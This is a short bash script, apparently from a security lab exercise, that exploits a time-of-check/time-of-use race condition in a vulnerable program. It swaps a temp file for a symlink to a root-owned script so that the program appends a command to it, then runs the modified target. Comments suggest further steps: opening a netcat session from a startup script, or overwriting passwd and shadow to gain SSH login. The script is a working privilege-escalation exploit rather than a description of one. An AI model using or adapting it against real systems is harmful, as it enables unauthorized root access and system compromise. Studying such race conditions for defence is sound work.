#!/usr/bin/bash
CRIT_FILE=./critical_script
VUL_FILE=./XYZ
TO_ADD="whoami"

# Reset the critical file we're targetting (just for testing purposes)
echo "Creating fake critical file (testing only)..."
sudo bash -c "echo echo ROOT SCRIPT! > $CRIT_FILE"
sudo chmod +x $CRIT_FILE

# Make the tmp file be usable by this user
echo "Creating temp file..."
rm -f $VUL_FILE
touch $VUL_FILE

# Make our vulnerable call, telling it to write a shell call
# at the end. If this were a startup script, we might have it
# setup a netcat session. We could also overwrite passwd and shadow
# to give ourselves an SSH login
echo "Running vulnerable program..."
echo $TO_ADD | ./$1 &

# Swap out the good file for a bad link after the check is made
echo "Waiting for safety check..."
sleep 1s
echo "Swapping file for link..."
rm $VUL_FILE
ln -s $CRIT_FILE $VUL_FILE

# Wait for vulp to finish up
echo "Waiting for vulnerable program to finish..."
wait

# Did it work?
if [ "" = "`grep $TO_ADD $CRIT_FILE`" ]
then
	echo "Exploit failed"
	exit
fi

# Run the script
echo "Target script successfully modified"
echo "Running target for the sake of proving a point..."
/bin/sh -c $CRIT_FILE

